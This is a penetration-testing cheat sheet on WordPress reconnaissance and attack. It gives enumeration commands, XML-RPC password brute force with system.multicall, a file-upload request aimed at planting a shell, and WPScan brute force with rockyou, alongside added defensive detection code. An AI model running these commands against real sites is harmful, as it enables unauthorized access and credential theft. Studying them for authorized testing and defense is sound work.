# CMS Wp/Drupal/Joomla/etc.

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
{% endtab %}
{% endtabs %}

## WordPress <a href="#basic-information" id="basic-information"></a>

### Basic Info <a href="#basic-information" id="basic-information"></a>

#### WordPress File & Path Basics

* **Uploads** → `/wp-content/uploads/YYYY/MM/filename`\
  Example: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
* **Themes** → `/wp-content/themes/[theme]/`
  * Uploading a malicious file or editing PHP templates may provide RCE.
  * Example: `/wp-content/themes/twentytwelve/404.php`
* **Default login paths** →

  ```
  /wp-login.php
  /wp-login/
  /wp-admin/
  /wp-admin.php
  /login/
  ```
* **Important files**:
  * `wp-config.php` → Database credentials, salts, debug settings.
  * `license.txt` → May reveal WordPress version.
  * `xmlrpc.php` → Remote procedure call interface (often abused).
  * `wp-sitemap.xml` → Introduced in WP 5.5, lists public posts & taxonomies.
  * `wp-includes/` → Core libraries (JS, fonts, widgets, certs).
  * `wp-content/` → Plugins & themes directory.

#### **Post exploitation**

* The `wp-config.php` file contains the information WordPress needs to connect to the database: the database name, host, username and password, the authentication keys and salts, and the database table prefix. The same file can also enable DEBUG mode, which can be useful for troubleshooting.

### WordPress User Roles

* **Administrator** → Full control over site.
* **Editor** → Manage own + others’ posts.
* **Author** → Manage and publish own posts.
* **Contributor** → Write posts, but cannot publish.
* **Subscriber** → Read posts & manage their profile.

***

## **WordPress - Enumeration** <a href="#passive-enumeration" id="passive-enumeration"></a>

### Passive Enumeration

Passive techniques rely on publicly accessible resources without direct interaction that might raise alarms.

#### 1. Identify WordPress Version

* `license.txt` or `readme.html` may disclose version.
* HTML meta tags:

  ```bash
  curl https://victim.com/ | grep 'content="WordPress'
  ```
* Inspect linked CSS/JS files (`?ver=X.Y.Z`).

![](https://book.hacktricks.wiki/en/images/image%20\(1111\).png)

![](https://book.hacktricks.wiki/en/images/image%20\(533\).png)

![](https://book.hacktricks.wiki/en/images/image%20\(524\).png)

#### 2. Enumerate Plugins & Themes

* Plugins:

  ```bash
  curl -s https://target.com | grep 'wp-content/plugins/'
  curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
  ```
* Themes:

  ```bash
  curl -s https://target.com | grep 'wp-content/themes/'
  curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
  ```

#### 3. Extract Versions from Assets

```bash
curl -s https://target.com | grep '?ver='
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
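The three passive checks above (generator meta tag, plugin/theme slugs in asset paths, `?ver=` values) as one parser, added here as an example and not part of the original page; it runs over a constructed sample page rather than a live site, so it can also be pointed at saved HTML of your own site to see what it leaks.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample of a WordPress front page; not taken from any real site.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="https://example.test/wp-content/themes/twentytwentyfour/style.css?ver=1.0" />
<link rel="stylesheet" href="https://example.test/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.4" />
<script src="https://example.test/wp-content/plugins/woocommerce/assets/js/frontend.min.js?ver=8.3.1"></script>
<script src="https://example.test/wp-includes/js/jquery/jquery.min.js?ver=3.7.1"></script>
</head><body></body></html>"""

# Matches /wp-content/plugins/<slug>/ and /wp-content/themes/<slug>/ in any asset URL.
_SLUG_RE = re.compile(r"/wp-content/(plugins|themes)/([^/?#]+)/")

class _AssetCollector(HTMLParser):
    """Collects the generator meta tag plus every href/src attribute seen."""
    def __init__(self):
        super().__init__()
        self.generator = None
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() == "generator":
            self.generator = a.get("content")
        for key in ("href", "src"):
            if a.get(key):
                self.urls.append(a[key])

def fingerprint(html):
    """Return the core version disclosed by the generator tag (or None) and the
    plugin/theme slugs found in asset paths, each with the ?ver= value it exposes."""
    collector = _AssetCollector()
    collector.feed(html)
    result = {"core_version": None, "plugins": {}, "themes": {}}
    if collector.generator:
        m = re.search(r"WordPress\s+([\d.]+)", collector.generator)
        if m:
            result["core_version"] = m.group(1)
    for url in collector.urls:
        m = _SLUG_RE.search(url)
        if not m:
            continue  # core assets under /wp-includes/ are not plugin or theme slugs
        kind, slug = m.group(1), m.group(2)
        ver = parse_qs(urlsplit(url).query).get("ver", [None])[0]
        result[kind].setdefault(slug, ver)  # keep the first version seen per slug
    return result
```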

### Active enumeration <a href="#active-enumeration" id="active-enumeration"></a>

#### Plugins and Themes <a href="#plugins-and-themes" id="plugins-and-themes"></a>

You probably won't be able to find all the plugins and themes passively. To discover all of them, you will need to **actively brute-force a list of plugins and themes** (fortunately there are automated tools that ship with such lists).

#### 1. User Enumeration

* **Author ID brute-force**:

  ```bash
  curl -s -I http://blog.example.com/?author=1
  ```

  * `200` / `30X` = valid ID
  * `400` = invalid ID
* **WP REST API**:

  ```bash
  curl http://blog.example.com/wp-json/wp/v2/users
  ```

**Login error messages** → Differentiate valid vs. invalid usernames.

#### 2. User Information via JSON

* Posts API:

  ```bash
  curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
  ```
* Pages API (may leak IPs):

  ```bash
  curl http://blog.example.com/wp-json/wp/v2/pages
  ```
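Detection logic for the user-enumeration patterns in sections 1 and 2 (sequential `?author=N` probing and `/wp-json/wp/v2/users` listing), added here as an example and not part of the original page. It runs over constructed combined-format access-log lines; the threshold of three distinct author ids is an assumption you would tune to your site.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log lines; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/8.4.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/8.4.0"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /?author=3 HTTP/1.1" 404 0 "-" "curl/8.4.0"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /?author=4 HTTP/1.1" 404 0 "-" "curl/8.4.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.0.2.9 - - [10/Oct/2023:13:57:10 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2023:13:57:12 +0000] "GET /2023/10/hello-world/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# client ip, request method, request target and status code from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

USER_ENDPOINTS = ("/wp-json/wp/v2/users", "/wp-json/wp/v2/users/")

def analyze(log_text, author_threshold=3):
    """Return {ip: [findings]} for clients whose requests match the user-enumeration
    patterns on this page: probing several ?author=N ids, or listing /wp-json/wp/v2/users."""
    author_ids = defaultdict(set)
    rest_hits = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _method, target, _status = m.groups()
        parts = urlsplit(target)
        ids = parse_qs(parts.query).get("author")
        if ids:
            author_ids[ip].add(ids[0])
        elif parts.path in USER_ENDPOINTS:
            rest_hits[ip] += 1
    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:  # one ?author=1 hit is normal for a visitor
            findings[ip].append(f"author-id enumeration: {len(ids)} distinct ids")
    for ip, n in rest_hits.items():
        findings[ip].append(f"REST user listing: {n} request(s)")
    return dict(findings)
```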

#### 3. XML-RPC Abuse

* Check availability:

  ```xml
  <methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
  </methodCall>
  ```
<figure><img src="https://1165982130-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Et8P5OeWSCJodZ98ujw%2Fuploads%2F2qRj7aQUycKAzHsfVJuG%2Fimage.png?alt=media&#x26;token=3da6b0cb-8433-4af7-9278-8488e2625a9b" alt=""><figcaption></figcaption></figure>

* Credential brute-force methods (brute-force tooling: <https://github.com/relarizky/wpxploit>):

  * `wp.getUsersBlogs`

  ![](https://book.hacktricks.wiki/en/images/image%20\(107\)%20\(2\)%20\(2\)%20\(2\)%20\(2\)%20\(2\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(2\)%20\(4\)%20\(1\).png)

  * `wp.getCategories`
  * `metaWeblog.getUsersBlogs`
* File upload via `wp.uploadFile` (useful for shell upload if the credentials are valid); see the request below.
* **Optimization** → Use `system.multicall` for faster brute force attempts.

With valid credentials you can upload a file; the response contains the path of the uploaded file.

```xml
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
    <methodName>wp.uploadFile</methodName>
    <params>
        <param><value><string>1</string></value></param>
        <param><value><string>username</string></value></param>
        <param><value><string>password</string></value></param>
        <param>
            <value>
                <struct>
                    <member>
                        <name>name</name>
                        <value><string>filename.jpg</string></value>
                    </member>
                    <member>
                        <name>type</name>
                        <value><string>mime/type</string></value>
                    </member>
                    <member>
                        <name>bits</name>
                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
                    </member>
                </struct>
            </value>
        </param>
    </params>
</methodCall>
```

There is also a **faster way** to brute-force credentials using **`system.multicall`**, since several credential pairs can be tried in the same request:

<figure><img src="https://book.hacktricks.wiki/en/images/image%20(628).png" alt=""><figcaption></figcaption></figure>
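A request-body check that counts the credential-taking XML-RPC methods listed above inside a `system.multicall` envelope, the way a WAF or reverse proxy in front of `xmlrpc.php` would reject bundled guessing; added here as an example and not part of the original page. The sample body is constructed, and `max_attempts` is an assumed policy value.

```python
import xml.etree.ElementTree as ET

# XML-RPC methods on this page that take a username and password.
CREDENTIAL_METHODS = {"wp.getUsersBlogs", "wp.getCategories",
                      "metaWeblog.getUsersBlogs", "wp.uploadFile"}

# Constructed system.multicall body bundling two wp.getUsersBlogs attempts (sample, not captured traffic).
SAMPLE_MULTICALL = """<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value><value><string>guess1</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value><value><string>guess2</string></value></data></array></value></member></struct></value>
</data></array></value></param></params></methodCall>"""

SAMPLE_LISTMETHODS = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"

def credential_calls(body):
    """List the credential-taking method names in one XML-RPC request body,
    expanding system.multicall so each bundled call is counted on its own."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        return []
    top = (root.findtext("methodName") or "").strip()
    if top != "system.multicall":
        return [top] if top in CREDENTIAL_METHODS else []
    names = []
    for member in root.iter("member"):
        if (member.findtext("name") or "").strip() == "methodName":
            name = (member.findtext("value/string") or "").strip()
            if name in CREDENTIAL_METHODS:
                names.append(name)
    return names

def should_reject(body, max_attempts=1):
    """Policy check: reject a body carrying more than max_attempts credential-taking
    calls, which removes the speed-up that multicall gives to password guessing."""
    return len(credential_calls(body)) > max_attempts
```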

***

## Automatic Tools <a href="#automatic-tools" id="automatic-tools"></a>

### **CMSmap**

[**CMSmap**](https://github.com/dionach/CMSmap) is a Python tool that automates detecting and exploiting vulnerabilities in CMSs (WordPress, Joomla, Drupal, etc.).

* `-s` : target site
* `-t` : number of threads
* `-a` : custom User-Agent

```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
```

### **WPScan**

[**WPScan**](https://wpscan.com/) is specialized for WordPress vulnerability scanning.

* `--rua` : use a random User-Agent
* `-e` : enumerate users, plugins, themes, timthumbs, config backups, DB exports, media
* `--url` : target WordPress site
* `--plugins-detection` : plugin detection mode (aggressive, mixed, passive)
* `--api-token` : WPScan API token (the free plan allows ~50 requests/day)

```bash
wpscan --rua -e ap,at,tt,cb,dbe,u,m \
  --url http://www.domain.com \
  --plugins-detection aggressive \
  --api-token <API_TOKEN> \
  --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt

# If you specifically want to brute-force the 'admin' user:
wpscan --url http://www.domain.com \
  -U admin \
  -P /usr/share/wordlists/rockyou.txt \
  --api-token <API_TOKEN>
```


